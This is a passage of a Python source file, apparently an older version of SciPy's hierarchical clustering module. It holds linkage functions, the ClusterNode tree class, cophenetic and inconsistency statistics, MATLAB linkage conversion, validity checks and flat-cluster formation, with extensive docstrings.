The upper triangular of the distance matrix. The result of
``pdist`` is returned in this form.
Returns
-------
Z : ndarray
A linkage matrix containing the hierarchical clustering. See
the ``linkage`` function documentation for more information
on its structure.
See Also
--------
linkage: for advanced creation of hierarchical clusterings.
"""
return linkage(y, method='average', metric='euclidean')
def weighted(y):
"""
Performs weighted/WPGMA linkage on the condensed distance matrix.
See ``linkage`` for more information on the return
structure and algorithm.
Parameters
----------
y : ndarray
The upper triangular of the distance matrix. The result of
``pdist`` is returned in this form.
Returns
-------
Z : ndarray
A linkage matrix containing the hierarchical clustering. See
the ``linkage`` function documentation for more information
on its structure.
See Also
--------
linkage : for advanced creation of hierarchical clusterings.
"""
return linkage(y, method='weighted', metric='euclidean')
def centroid(y):
"""
Performs centroid/UPGMC linkage.
See ``linkage`` for more information on the return structure
and algorithm.
The following are common calling conventions:
1. ``Z = centroid(y)``
Performs centroid/UPGMC linkage on the condensed distance
matrix ``y``. See ``linkage`` for more information on the return
structure and algorithm.
2. ``Z = centroid(X)``
Performs centroid/UPGMC linkage on the observation matrix ``X``
using Euclidean distance as the distance metric. See ``linkage``
for more information on the return structure and algorithm.
Parameters
----------
y : ndarray
A condensed or redundant distance matrix. A condensed
distance matrix is a flat array containing the upper
triangular of the distance matrix. This is the form that
``pdist`` returns. Alternatively, a collection of
m observation vectors in n dimensions may be passed as
a m by n array.
Returns
-------
Z : ndarray
A linkage matrix containing the hierarchical clustering. See
the ``linkage`` function documentation for more information
on its structure.
See Also
--------
linkage: for advanced creation of hierarchical clusterings.
"""
return linkage(y, method='centroid', metric='euclidean')
def median(y):
"""
Performs median/WPGMC linkage.
See ``linkage`` for more information on the return structure
and algorithm.
The following are common calling conventions:
1. ``Z = median(y)``
Performs median/WPGMC linkage on the condensed distance matrix
``y``. See ``linkage`` for more information on the return
structure and algorithm.
2. ``Z = median(X)``
Performs median/WPGMC linkage on the observation matrix ``X``
using Euclidean distance as the distance metric. See linkage
for more information on the return structure and algorithm.
Parameters
----------
y : ndarray
A condensed or redundant distance matrix. A condensed
distance matrix is a flat array containing the upper
triangular of the distance matrix. This is the form that
``pdist`` returns. Alternatively, a collection of
m observation vectors in n dimensions may be passed as
a m by n array.
Returns
-------
Z : ndarray
The hierarchical clustering encoded as a linkage matrix.
See Also
--------
linkage: for advanced creation of hierarchical clusterings.
"""
return linkage(y, method='median', metric='euclidean')
def ward(y):
"""
Performs Ward's linkage on a condensed or redundant distance matrix.
See linkage for more information on the return structure
and algorithm.
The following are common calling conventions:
1. ``Z = ward(y)``
       Performs Ward's linkage on the condensed distance matrix ``y``. See
linkage for more information on the return structure and
algorithm.
2. ``Z = ward(X)``
Performs Ward's linkage on the observation matrix ``X`` using
Euclidean distance as the distance metric. See linkage for more
information on the return structure and algorithm.
Parameters
----------
y : ndarray
A condensed or redundant distance matrix. A condensed
distance matrix is a flat array containing the upper
triangular of the distance matrix. This is the form that
``pdist`` returns. Alternatively, a collection of
m observation vectors in n dimensions may be passed as
a m by n array.
Returns
-------
Z : ndarray
The hierarchical clustering encoded as a linkage matrix.
See Also
--------
linkage: for advanced creation of hierarchical clusterings.
"""
return linkage(y, method='ward', metric='euclidean')
def linkage(y, method='single', metric='euclidean'):
"""
Performs hierarchical/agglomerative clustering on the condensed
distance matrix y.
y must be a :math:`{n \\choose 2}` sized
vector where n is the number of original observations paired
in the distance matrix. The behavior of this function is very
similar to the MATLAB linkage function.
An :math:`(n-1)` by 4 matrix ``Z`` is returned. At the
:math:`i`-th iteration, clusters with indices ``Z[i, 0]`` and
``Z[i, 1]`` are combined to form cluster :math:`n + i`. A
cluster with an index less than :math:`n` corresponds to one of
the :math:`n` original observations. The distance between
clusters ``Z[i, 0]`` and ``Z[i, 1]`` is given by ``Z[i, 2]``. The
fourth value ``Z[i, 3]`` represents the number of original
observations in the newly formed cluster.
The following linkage methods are used to compute the distance
:math:`d(s, t)` between two clusters :math:`s` and
:math:`t`. The algorithm begins with a forest of clusters that
have yet to be used in the hierarchy being formed. When two
clusters :math:`s` and :math:`t` from this forest are combined
into a single cluster :math:`u`, :math:`s` and :math:`t` are
removed from the forest, and :math:`u` is added to the
forest. When only one cluster remains in the forest, the algorithm
stops, and this cluster becomes the root.
A distance matrix is maintained at each iteration. The ``d[i,j]``
entry corresponds to the distance between cluster :math:`i` and
:math:`j` in the original forest.
At each iteration, the algorithm must update the distance matrix
to reflect the distance of the newly formed cluster u with the
remaining clusters in the forest.
Suppose there are :math:`|u|` original observations
:math:`u[0], \\ldots, u[|u|-1]` in cluster :math:`u` and
:math:`|v|` original objects :math:`v[0], \\ldots, v[|v|-1]` in
cluster :math:`v`. Recall :math:`s` and :math:`t` are
combined to form cluster :math:`u`. Let :math:`v` be any
remaining cluster in the forest that is not :math:`u`.
The following are methods for calculating the distance between the
newly formed cluster :math:`u` and each :math:`v`.
* method='single' assigns
.. math::
d(u,v) = \\min(dist(u[i],v[j]))
for all points :math:`i` in cluster :math:`u` and
:math:`j` in cluster :math:`v`. This is also known as the
Nearest Point Algorithm.
* method='complete' assigns
.. math::
d(u, v) = \\max(dist(u[i],v[j]))
for all points :math:`i` in cluster u and :math:`j` in
      cluster :math:`v`. This is also known as the Farthest Point
      Algorithm or Voorhees Algorithm.
* method='average' assigns
.. math::
d(u,v) = \\sum_{ij} \\frac{d(u[i], v[j])}
{(|u|*|v|)}
for all points :math:`i` and :math:`j` where :math:`|u|`
and :math:`|v|` are the cardinalities of clusters :math:`u`
and :math:`v`, respectively. This is also called the UPGMA
algorithm.
* method='weighted' assigns
.. math::
d(u,v) = (dist(s,v) + dist(t,v))/2
where cluster u was formed with cluster s and t and v
is a remaining cluster in the forest. (also called WPGMA)
* method='centroid' assigns
.. math::
dist(s,t) = ||c_s-c_t||_2
where :math:`c_s` and :math:`c_t` are the centroids of
clusters :math:`s` and :math:`t`, respectively. When two
clusters :math:`s` and :math:`t` are combined into a new
cluster :math:`u`, the new centroid is computed over all the
original objects in clusters :math:`s` and :math:`t`. The
distance then becomes the Euclidean distance between the
centroid of :math:`u` and the centroid of a remaining cluster
:math:`v` in the forest. This is also known as the UPGMC
algorithm.
* method='median' assigns :math:`d(s,t)` like the ``centroid``
method. When two clusters :math:`s` and :math:`t` are combined
into a new cluster :math:`u`, the average of centroids s and t
      gives the new centroid :math:`u`. This is also known as the
WPGMC algorithm.
* method='ward' uses the Ward variance minimization algorithm.
The new entry :math:`d(u,v)` is computed as follows,
.. math::
d(u,v) = \\sqrt{\\frac{|v|+|s|}
{T}d(v,s)^2
+ \\frac{|v|+|t|}
{T}d(v,t)^2
- \\frac{|v|}
{T}d(s,t)^2}
where :math:`u` is the newly joined cluster consisting of
clusters :math:`s` and :math:`t`, :math:`v` is an unused
cluster in the forest, :math:`T=|v|+|s|+|t|`, and
:math:`|*|` is the cardinality of its argument. This is also
known as the incremental algorithm.
Warning: When the minimum distance pair in the forest is chosen, there
may be two or more pairs with the same minimum distance. This
      implementation may choose a different minimum than the MATLAB
version.
Parameters
----------
y : ndarray
A condensed or redundant distance matrix. A condensed distance matrix
is a flat array containing the upper triangular of the distance matrix.
This is the form that ``pdist`` returns. Alternatively, a collection of
:math:`m` observation vectors in n dimensions may be passed as an
:math:`m` by :math:`n` array.
method : str, optional
The linkage algorithm to use. See the ``Linkage Methods`` section below
for full descriptions.
metric : str or function, optional
The distance metric to use in the case that y is a collection of
observation vectors; ignored otherwise. See the ``distance.pdist``
function for a list of valid distance metrics. A custom distance
function can also be used. See the ``distance.pdist`` function for
details.
Returns
-------
Z : ndarray
The hierarchical clustering encoded as a linkage matrix.
"""
if not isinstance(method, string_types):
raise TypeError("Argument 'method' must be a string.")
y = _convert_to_double(np.asarray(y, order='c'))
s = y.shape
if len(s) == 1:
distance.is_valid_y(y, throw=True, name='y')
d = distance.num_obs_y(y)
if method not in _cpy_non_euclid_methods:
raise ValueError("Valid methods when the raw observations are "
"omitted are 'single', 'complete', 'weighted', "
"and 'average'.")
# Since the C code does not support striding using strides.
[y] = _copy_arrays_if_base_present([y])
Z = np.zeros((d - 1, 4))
if method == 'single':
_hierarchy.slink(y, Z, int(d))
else:
_hierarchy.linkage(y, Z, int(d),
int(_cpy_non_euclid_methods[method]))
elif len(s) == 2:
X = y
n = s[0]
if method not in _cpy_linkage_methods:
raise ValueError('Invalid method: %s' % method)
if method in _cpy_non_euclid_methods:
dm = distance.pdist(X, metric)
Z = np.zeros((n - 1, 4))
if method == 'single':
_hierarchy.slink(dm, Z, n)
else:
_hierarchy.linkage(dm, Z, n,
int(_cpy_non_euclid_methods[method]))
elif method in _cpy_euclid_methods:
if metric != 'euclidean':
raise ValueError(("Method '%s' requires the distance metric "
"to be euclidean") % method)
dm = distance.pdist(X, metric)
Z = np.zeros((n - 1, 4))
_hierarchy.linkage(dm, Z, n,
int(_cpy_euclid_methods[method]))
return Z
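# Hedged illustration (doctest-style comment, not part of the original
# module): clustering four 1-D observations and reading the (n - 1) by 4
# linkage matrix whose layout is described in the docstring above.
#
#   >>> import numpy as np
#   >>> from scipy.cluster.hierarchy import linkage
#   >>> X = np.array([[0.0], [0.1], [5.0], [5.1]])
#   >>> Z = linkage(X, method='single', metric='euclidean')
#   >>> Z.shape     # one row per merge: [idx1, idx2, distance, new size]
#   (3, 4)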
class ClusterNode:
"""
A tree node class for representing a cluster.
Leaf nodes correspond to original observations, while non-leaf nodes
correspond to non-singleton clusters.
The to_tree function converts a matrix returned by the linkage
function into an easy-to-use tree representation.
See Also
--------
to_tree : for converting a linkage matrix ``Z`` into a tree object.
"""
def __init__(self, id, left=None, right=None, dist=0, count=1):
if id < 0:
raise ValueError('The id must be non-negative.')
if dist < 0:
raise ValueError('The distance must be non-negative.')
if (left is None and right is not None) or \
(left is not None and right is None):
raise ValueError('Only full or proper binary trees are permitted.'
' This node has one child.')
if count < 1:
raise ValueError('A cluster must contain at least one original '
'observation.')
self.id = id
self.left = left
self.right = right
self.dist = dist
if self.left is None:
self.count = count
else:
self.count = left.count + right.count
def get_id(self):
"""
The identifier of the target node.
For ``0 <= i < n``, `i` corresponds to original observation i.
For ``n <= i < 2n-1``, `i` corresponds to non-singleton cluster formed
at iteration ``i-n``.
Returns
-------
id : int
The identifier of the target node.
"""
return self.id
def get_count(self):
"""
The number of leaf nodes (original observations) belonging to
the cluster node nd. If the target node is a leaf, 1 is
returned.
Returns
-------
get_count : int
The number of leaf nodes below the target node.
"""
return self.count
def get_left(self):
"""
Return a reference to the left child tree object.
Returns
-------
left : ClusterNode
The left child of the target node. If the node is a leaf,
None is returned.
"""
return self.left
def get_right(self):
"""
Returns a reference to the right child tree object.
Returns
-------
right : ClusterNode
            The right child of the target node. If the node is a leaf,
None is returned.
"""
return self.right
def is_leaf(self):
"""
Returns True if the target node is a leaf.
Returns
-------
leafness : bool
True if the target node is a leaf node.
"""
return self.left is None
def pre_order(self, func=(lambda x: x.id)):
"""
Performs pre-order traversal without recursive function calls.
When a leaf node is first encountered, ``func`` is called with
the leaf node as its argument, and its result is appended to
the list.
For example, the statement::
ids = root.pre_order(lambda x: x.id)
returns a list of the node ids corresponding to the leaf nodes
of the tree as they appear from left to right.
Parameters
----------
func : function
Applied to each leaf ClusterNode object in the pre-order traversal.
            Given the i'th leaf node in the pre-order traversal ``n[i]``, the
result of func(n[i]) is stored in L[i]. If not provided, the index
of the original observation to which the node corresponds is used.
Returns
-------
L : list
The pre-order traversal.
"""
# Do a preorder traversal, caching the result. To avoid having to do
# recursion, we'll store the previous index we've visited in a vector.
n = self.count
curNode = [None] * (2 * n)
lvisited = set()
rvisited = set()
curNode[0] = self
k = 0
preorder = []
while k >= 0:
nd = curNode[k]
ndid = nd.id
if nd.is_leaf():
preorder.append(func(nd))
k = k - 1
else:
if ndid not in lvisited:
curNode[k + 1] = nd.left
lvisited.add(ndid)
k = k + 1
elif ndid not in rvisited:
curNode[k + 1] = nd.right
rvisited.add(ndid)
k = k + 1
# If we've visited the left and right of this non-leaf
# node already, go up in the tree.
else:
k = k - 1
return preorder
_cnode_bare = ClusterNode(0)
_cnode_type = type(ClusterNode)
def to_tree(Z, rd=False):
"""
Converts a hierarchical clustering encoded in the matrix ``Z`` (by
linkage) into an easy-to-use tree object.
The reference r to the root ClusterNode object is returned.
Each ClusterNode object has a left, right, dist, id, and count
attribute. The left and right attributes point to ClusterNode objects
that were combined to generate the cluster. If both are None then
the ClusterNode object is a leaf node, its count must be 1, and its
distance is meaningless but set to 0.
Note: This function is provided for the convenience of the library
user. ClusterNodes are not used as input to any of the functions in this
library.
Parameters
----------
Z : ndarray
The linkage matrix in proper form (see the ``linkage``
function documentation).
rd : bool, optional
When False, a reference to the root ClusterNode object is
returned. Otherwise, a tuple (r,d) is returned. ``r`` is a
reference to the root node while ``d`` is a dictionary
mapping cluster ids to ClusterNode references. If a cluster id is
less than n, then it corresponds to a singleton cluster
(leaf node). See ``linkage`` for more information on the
assignment of cluster ids to clusters.
Returns
-------
    r : ClusterNode
        A reference to the root ClusterNode object. When ``rd`` is True,
        the tuple ``(r, d)`` described above is returned instead.
"""
Z = np.asarray(Z, order='c')
is_valid_linkage(Z, throw=True, name='Z')
# The number of original objects is equal to the number of rows minus
# 1.
n = Z.shape[0] + 1
# Create a list full of None's to store the node objects
d = [None] * (n * 2 - 1)
# Create the nodes corresponding to the n original objects.
for i in xrange(0, n):
d[i] = ClusterNode(i)
nd = None
for i in xrange(0, n - 1):
fi = int(Z[i, 0])
fj = int(Z[i, 1])
if fi > i + n:
raise ValueError(('Corrupt matrix Z. Index to derivative cluster '
'is used before it is formed. See row %d, '
'column 0') % fi)
if fj > i + n:
raise ValueError(('Corrupt matrix Z. Index to derivative cluster '
'is used before it is formed. See row %d, '
'column 1') % fj)
nd = ClusterNode(i + n, d[fi], d[fj], Z[i, 2])
# ^ id ^ left ^ right ^ dist
if Z[i, 3] != nd.count:
raise ValueError(('Corrupt matrix Z. The count Z[%d,3] is '
'incorrect.') % i)
d[n + i] = nd
if rd:
return (nd, d)
else:
return nd
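# Hedged illustration (comment only): converting the small linkage from the
# sketch above into a tree and listing the original observation ids in
# pre-order.
#
#   >>> root = to_tree(Z)
#   >>> root.get_count()
#   4
#   >>> root.pre_order()    # leaf ids left to right, e.g. [0, 1, 2, 3]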
def _convert_to_bool(X):
if X.dtype != bool:
X = X.astype(bool)
if not X.flags.contiguous:
X = X.copy()
return X
def _convert_to_double(X):
if X.dtype != np.double:
X = X.astype(np.double)
if not X.flags.contiguous:
X = X.copy()
return X
def cophenet(Z, Y=None):
"""
Calculates the cophenetic distances between each observation in
the hierarchical clustering defined by the linkage ``Z``.
Suppose ``p`` and ``q`` are original observations in
disjoint clusters ``s`` and ``t``, respectively and
``s`` and ``t`` are joined by a direct parent cluster
``u``. The cophenetic distance between observations
``i`` and ``j`` is simply the distance between
clusters ``s`` and ``t``.
Parameters
----------
Z : ndarray
The hierarchical clustering encoded as an array
(see ``linkage`` function).
Y : ndarray (optional)
Calculates the cophenetic correlation coefficient ``c`` of a
hierarchical clustering defined by the linkage matrix `Z`
of a set of :math:`n` observations in :math:`m`
dimensions. `Y` is the condensed distance matrix from which
`Z` was generated.
Returns
-------
c : ndarray
        The cophenetic correlation coefficient (if ``Y`` is passed).
d : ndarray
The cophenetic distance matrix in condensed form. The
:math:`ij` th entry is the cophenetic distance between
original observations :math:`i` and :math:`j`.
"""
Z = np.asarray(Z, order='c')
is_valid_linkage(Z, throw=True, name='Z')
Zs = Z.shape
n = Zs[0] + 1
zz = np.zeros((n * (n - 1)) // 2, dtype=np.double)
# Since the C code does not support striding using strides.
# The dimensions are used instead.
Z = _convert_to_double(Z)
_hierarchy.cophenetic_distances(Z, zz, int(n))
if Y is None:
return zz
Y = np.asarray(Y, order='c')
distance.is_valid_y(Y, throw=True, name='Y')
z = zz.mean()
y = Y.mean()
Yy = Y - y
Zz = zz - z
numerator = (Yy * Zz)
denomA = Yy ** 2
denomB = Zz ** 2
c = numerator.sum() / np.sqrt((denomA.sum() * denomB.sum()))
return (c, zz)
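# Hedged illustration (comment only): the cophenetic correlation coefficient
# is usually computed against the condensed distances the linkage was built
# from.
#
#   >>> from scipy.spatial.distance import pdist
#   >>> c, coph_dists = cophenet(Z, pdist(X))
#   >>> coph_dists.shape    # condensed form: n * (n - 1) / 2 entries
#   (6,)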
def inconsistent(Z, d=2):
"""
Calculates inconsistency statistics on a linkage.
Note: This function behaves similarly to the MATLAB(TM)
inconsistent function.
Parameters
----------
Z : ndarray
The :math:`(n-1)` by 4 matrix encoding the linkage
(hierarchical clustering). See ``linkage`` documentation
for more information on its form.
d : int, optional
The number of links up to `d` levels below each
non-singleton cluster.
Returns
-------
R : ndarray
        A :math:`(n-1)` by 4 matrix where the ``i``'th row
contains the link statistics for the non-singleton cluster
``i``. The link statistics are computed over the link
heights for links :math:`d` levels below the cluster
``i``. ``R[i,0]`` and ``R[i,1]`` are the mean and standard
deviation of the link heights, respectively; ``R[i,2]`` is
the number of links included in the calculation; and
``R[i,3]`` is the inconsistency coefficient,
.. math:: \\frac{\\mathtt{Z[i,2]}-\\mathtt{R[i,0]}} {R[i,1]}
"""
Z = np.asarray(Z, order='c')
Zs = Z.shape
is_valid_linkage(Z, throw=True, name='Z')
if (not d == np.floor(d)) or d < 0:
raise ValueError('The second argument d must be a nonnegative '
'integer value.')
# Since the C code does not support striding using strides.
# The dimensions are used instead.
[Z] = _copy_arrays_if_base_present([Z])
n = Zs[0] + 1
R = np.zeros((n - 1, 4), dtype=np.double)
_hierarchy.inconsistent(Z, R, int(n), int(d))
return R
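# Hedged illustration (comment only): each row of R summarizes the link
# heights up to d levels below one non-singleton cluster as
# [mean height, height std, number of links, inconsistency coefficient].
#
#   >>> R = inconsistent(Z, d=2)
#   >>> R.shape
#   (3, 4)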
def from_mlab_linkage(Z):
"""
Converts a linkage matrix generated by MATLAB(TM) to a new
linkage matrix compatible with this module.
The conversion does two things:
* the indices are converted from ``1..N`` to ``0..(N-1)`` form,
and
    * a fourth column Z[:,3] is added where Z[i,3] represents the
number of original observations (leaves) in the non-singleton
cluster i.
This function is useful when loading in linkages from legacy data
files generated by MATLAB.
Parameters
----------
Z : ndarray
A linkage matrix generated by MATLAB(TM).
Returns
-------
ZS : ndarray
A linkage matrix compatible with this library.
"""
Z = np.asarray(Z, dtype=np.double, order='c')
Zs = Z.shape
# If it's empty, return it.
if len(Zs) == 0 or (len(Zs) == 1 and Zs[0] == 0):
return Z.copy()
if len(Zs) != 2:
raise ValueError("The linkage array must be rectangular.")
# If it contains no rows, return it.
if Zs[0] == 0:
return Z.copy()
Zpart = Z.copy()
if Zpart[:, 0:2].min() != 1.0 and Zpart[:, 0:2].max() != 2 * Zs[0]:
raise ValueError('The format of the indices is not 1..N')
Zpart[:, 0:2] -= 1.0
CS = np.zeros((Zs[0],), dtype=np.double)
_hierarchy.calculate_cluster_sizes(Zpart, CS, int(Zs[0]) + 1)
return np.hstack([Zpart, CS.reshape(Zs[0], 1)])
def to_mlab_linkage(Z):
"""
Converts a linkage matrix to a MATLAB(TM) compatible one.
Converts a linkage matrix ``Z`` generated by the linkage function
of this module to a MATLAB(TM) compatible one. The return linkage
matrix has the last column removed and the cluster indices are
converted to ``1..N`` indexing.
Parameters
----------
Z : ndarray
A linkage matrix generated by this library.
Returns
-------
to_mlab_linkage : ndarray
A linkage matrix compatible with MATLAB(TM)'s hierarchical
clustering functions.
The return linkage matrix has the last column removed
and the cluster indices are converted to ``1..N`` indexing.
"""
Z = np.asarray(Z, order='c', dtype=np.double)
Zs = Z.shape
if len(Zs) == 0 or (len(Zs) == 1 and Zs[0] == 0):
return Z.copy()
is_valid_linkage(Z, throw=True, name='Z')
ZP = Z[:, 0:3].copy()
ZP[:, 0:2] += 1.0
return ZP
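# Hedged illustration (comment only): the two converters round-trip a linkage
# between the 0-based, 4-column form used here and MATLAB's 1-based,
# 3-column form.
#
#   >>> Z_mlab = to_mlab_linkage(Z)         # drops counts, 1-based indices
#   >>> Z_back = from_mlab_linkage(Z_mlab)  # restores counts, 0-based indices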
def is_monotonic(Z):
"""
Returns True if the linkage passed is monotonic.
The linkage is monotonic if for every cluster :math:`s` and :math:`t`
joined, the distance between them is no less than the distance
between any previously joined clusters.
Parameters
----------
Z : ndarray
The linkage matrix to check for monotonicity.
Returns
-------
b : bool
A boolean indicating whether the linkage is monotonic.
"""
Z = np.asarray(Z, order='c')
is_valid_linkage(Z, throw=True, name='Z')
    # We expect each value to be no less than its predecessor.
return (Z[1:, 2] >= Z[:-1, 2]).all()
def is_valid_im(R, warning=False, throw=False, name=None):
"""Returns True if the inconsistency matrix passed is valid.
It must be a :math:`n` by 4 numpy array of doubles. The standard
deviations ``R[:,1]`` must be nonnegative. The link counts
``R[:,2]`` must be positive and no greater than :math:`n-1`.
Parameters
----------
R : ndarray
The inconsistency matrix to check for validity.
warning : bool, optional
When True, issues a Python warning if the linkage
matrix passed is invalid.
throw : bool, optional
When True, throws a Python exception if the linkage
matrix passed is invalid.
name : str, optional
This string refers to the variable name of the invalid
linkage matrix.
Returns
-------
b : bool
True if the inconsistency matrix is valid.
"""
R = np.asarray(R, order='c')
valid = True
name_str = "%r " % name if name else ''
try:
if type(R) != np.ndarray:
raise TypeError('Variable %spassed as inconsistency matrix is not '
'a numpy array.' % name_str)
if R.dtype != np.double:
raise TypeError('Inconsistency matrix %smust contain doubles '
'(double).' % name_str)
if len(R.shape) != 2:
raise ValueError('Inconsistency matrix %smust have shape=2 (i.e. '
'be two-dimensional).' % name_str)
if R.shape[1] != 4:
raise ValueError('Inconsistency matrix %smust have 4 columns.' %
name_str)
if R.shape[0] < 1:
raise ValueError('Inconsistency matrix %smust have at least one '
'row.' % name_str)
if (R[:, 0] < 0).any():
raise ValueError('Inconsistency matrix %scontains negative link '
'height means.' % name_str)
if (R[:, 1] < 0).any():
raise ValueError('Inconsistency matrix %scontains negative link '
'height standard deviations.' % name_str)
if (R[:, 2] < 0).any():
raise ValueError('Inconsistency matrix %scontains negative link '
'counts.' % name_str)
except Exception as e:
if throw:
raise
if warning:
_warning(str(e))
valid = False
return valid
def is_valid_linkage(Z, warning=False, throw=False, name=None):
"""
Checks the validity of a linkage matrix.
A linkage matrix is valid if it is a two dimensional
ndarray (type double) with :math:`n`
rows and 4 columns. The first two columns must contain indices
between 0 and :math:`2n-1`. For a given row ``i``,
:math:`0 \\leq \\mathtt{Z[i,0]} \\leq i+n-1`
and :math:`0 \\leq Z[i,1] \\leq i+n-1`
(i.e. a cluster cannot join another cluster unless the cluster
being joined has been generated.)
Parameters
----------
Z : array_like
Linkage matrix.
warning : bool, optional
When True, issues a Python warning if the linkage
matrix passed is invalid.
throw : bool, optional
When True, throws a Python exception if the linkage
matrix passed is invalid.
name : str, optional
This string refers to the variable name of the invalid
linkage matrix.
Returns
-------
b : bool
True if the linkage matrix is valid.
"""
Z = np.asarray(Z, order='c')
valid = True
name_str = "%r " % name if name else ''
try:
if type(Z) != np.ndarray:
raise TypeError('Passed linkage argument %sis not a valid array.' %
name_str)
if Z.dtype != np.double:
raise TypeError('Linkage matrix %smust contain doubles.' % name_str)
if len(Z.shape) != 2:
raise ValueError('Linkage matrix %smust have shape=2 (i.e. be '
'two-dimensional).' % name_str)
if Z.shape[1] != 4:
raise ValueError('Linkage matrix %smust have 4 columns.' % name_str)
if Z.shape[0] == 0:
raise ValueError('Linkage must be computed on at least two '
'observations.')
n = Z.shape[0]
if n > 1:
if ((Z[:, 0] < 0).any() or (Z[:, 1] < 0).any()):
raise ValueError('Linkage %scontains negative indices.' %
name_str)
if (Z[:, 2] < 0).any():
raise ValueError('Linkage %scontains negative distances.' %
name_str)
if (Z[:, 3] < 0).any():
raise ValueError('Linkage %scontains negative counts.' %
name_str)
if _check_hierarchy_uses_cluster_before_formed(Z):
raise ValueError('Linkage %suses non-singleton cluster before '
'it is formed.' % name_str)
if _check_hierarchy_uses_cluster_more_than_once(Z):
raise ValueError('Linkage %suses the same cluster more than once.'
% name_str)
except Exception as e:
if throw:
raise
if warning:
_warning(str(e))
valid = False
return valid
def _check_hierarchy_uses_cluster_before_formed(Z):
n = Z.shape[0] + 1
for i in xrange(0, n - 1):
if Z[i, 0] >= n + i or Z[i, 1] >= n + i:
return True
return False
def _check_hierarchy_uses_cluster_more_than_once(Z):
n = Z.shape[0] + 1
chosen = set([])
for i in xrange(0, n - 1):
if (Z[i, 0] in chosen) or (Z[i, 1] in chosen) or Z[i, 0] == Z[i, 1]:
return True
chosen.add(Z[i, 0])
chosen.add(Z[i, 1])
return False
def _check_hierarchy_not_all_clusters_used(Z):
n = Z.shape[0] + 1
chosen = set([])
for i in xrange(0, n - 1):
chosen.add(int(Z[i, 0]))
chosen.add(int(Z[i, 1]))
must_chosen = set(range(0, 2 * n - 2))
return len(must_chosen.difference(chosen)) > 0
def num_obs_linkage(Z):
"""
Returns the number of original observations of the linkage matrix
passed.
Parameters
----------
Z : ndarray
The linkage matrix on which to perform the operation.
Returns
-------
n : int
The number of original observations in the linkage.
"""
Z = np.asarray(Z, order='c')
is_valid_linkage(Z, throw=True, name='Z')
return (Z.shape[0] + 1)
def correspond(Z, Y):
"""
Checks for correspondence between linkage and condensed distance matrices
They must have the same number of original observations for
the check to succeed.
This function is useful as a sanity check in algorithms that make
extensive use of linkage and distance matrices that must
correspond to the same set of original observations.
Parameters
----------
Z : array_like
The linkage matrix to check for correspondence.
Y : array_like
The condensed distance matrix to check for correspondence.
Returns
-------
b : bool
A boolean indicating whether the linkage matrix and distance
matrix could possibly correspond to one another.
"""
is_valid_linkage(Z, throw=True)
distance.is_valid_y(Y, throw=True)
Z = np.asarray(Z, order='c')
Y = np.asarray(Y, order='c')
return distance.num_obs_y(Y) == num_obs_linkage(Z)
def fcluster(Z, t, criterion='inconsistent', depth=2, R=None, monocrit=None):
"""
Forms flat clusters from the hierarchical clustering defined by
the linkage matrix ``Z``.
Parameters
----------
Z : ndarray
The hierarchical clustering encoded with the matrix returned
by the `linkage` function.
t : float
The threshold to apply when forming flat clusters.
criterion : str, optional
The criterion to use in forming flat clusters. This can
be any of the following values:
``inconsistent`` : If a cluster node and all its
descendants have an inconsistent value less than or equal
to `t` then all its leaf descendants belong to the
same flat cluster. When no non-singleton cluster meets
this criterion, every node is assigned to its own
cluster. (Default)
``distance`` : Forms flat clusters so that the original
observations in each flat cluster have no greater a
cophenetic distance than `t`.
``maxclust`` : Finds a minimum threshold ``r`` so that
the cophenetic distance between any two original
observations in the same flat cluster is no more than
``r`` and no more than `t` flat clusters are formed.
``monocrit`` : Forms a flat cluster from a cluster node c
with index ``i`` when ``monocrit[i] <= t``.
For example, to threshold on the maximum mean distance
as computed in the inconsistency matrix R with a
threshold of 0.8 do:
MR = maxRstat(Z, R, 3)
fcluster(Z, t=0.8, criterion='monocrit', monocrit=MR)
``maxclust_monocrit`` : Forms a flat cluster from a
non-singleton cluster node ``c`` when ``monocrit[i] <=
r`` for all cluster indices ``i`` below and including
``c``. ``r`` is minimized such that no more than ``t``
flat clusters are formed. monocrit must be
monotonic. For example, to minimize the threshold t on
maximum inconsistency values so that no more than 3 flat
clusters are formed, do:
MI = maxinconsts(Z, R)
fcluster(Z, t=3, criterion='maxclust_monocrit', monocrit=MI)
depth : int, optional
The maximum depth to perform the inconsistency calculation.
It has no meaning for the other criteria. Default is 2.
R : ndarray, optional
The inconsistency matrix to use for the 'inconsistent'
criterion. This matrix is computed if not provided.
monocrit : ndarray, optional
An array of length n-1. `monocrit[i]` is the
statistic upon which non-singleton cluster i is thresholded. The
monocrit vector must be monotonic, i.e. given a node c with
index i, for all node indices j corresponding to nodes
below c, `monocrit[i] >= monocrit[j]`.
Returns
-------
fcluster : ndarray
An array of length n. T[i] is the flat cluster number to
which original observation i belongs.
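Examples
--------
A minimal sketch (assuming this module is importable as
``scipy.cluster.hierarchy``) on two well-separated toy groups:
>>> from scipy.cluster.hierarchy import linkage, fcluster
>>> X = [[0.0], [0.4], [5.0], [5.3]]
>>> Z = linkage(X, method='single')
>>> T = fcluster(Z, t=1.0, criterion='distance')
>>> sorted(set(int(i) for i in T))    # two flat clusters are formed
[1, 2]
>>> len(set(fcluster(Z, t=2, criterion='maxclust')))
2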
"""
Z = np.asarray(Z, order='c')
is_valid_linkage(Z, throw=True, name='Z')
n = Z.shape[0] + 1
T = np.zeros((n,), dtype='i')
# Since the C code does not support striding using strides.
# The dimensions are used instead.
[Z] = _copy_arrays_if_base_present([Z])
if criterion == 'inconsistent':
if R is None:
R = inconsistent(Z, depth)
else:
R = np.asarray(R, order='c')
is_valid_im(R, throw=True, name='R')
# Since the C code does not support striding using strides.
# The dimensions are used instead.
[R] = _copy_arrays_if_base_present([R])
_hierarchy.cluster_in(Z, R, T, float(t), int(n))
elif criterion == 'distance':
_hierarchy.cluster_dist(Z, T, float(t), int(n))
elif criterion == 'maxclust':
_hierarchy.cluster_maxclust_dist(Z, T, int(n), int(t))
elif criterion == 'monocrit':
[monocrit] = _copy_arrays_if_base_present([monocrit])
_hierarchy.cluster_monocrit(Z, monocrit, T, float(t), int(n))
elif criterion == 'maxclust_monocrit':
[monocrit] = _copy_arrays_if_base_present([monocrit])
_hierarchy.cluster_maxclust_monocrit(Z, monocrit, T, int(n), int(t))
else:
raise ValueError('Invalid cluster formation criterion: %s'
% str(criterion))
return T
def fclusterdata(X, t, criterion='inconsistent',
metric='euclidean', depth=2, method='single', R=None):
"""
Cluster observation data using a given metric.
Clusters the original observations in the n-by-m data
matrix X (n observations in m dimensions), using the given distance
metric (Euclidean by default) to calculate distances between original observations,
performs hierarchical clustering using the single linkage algorithm,
and forms flat clusters using the inconsistency method with `t` as the
cut-off threshold.
A one-dimensional array T of length n is returned. T[i] is the index
of the flat cluster to which the original observation i belongs.
Parameters
----------
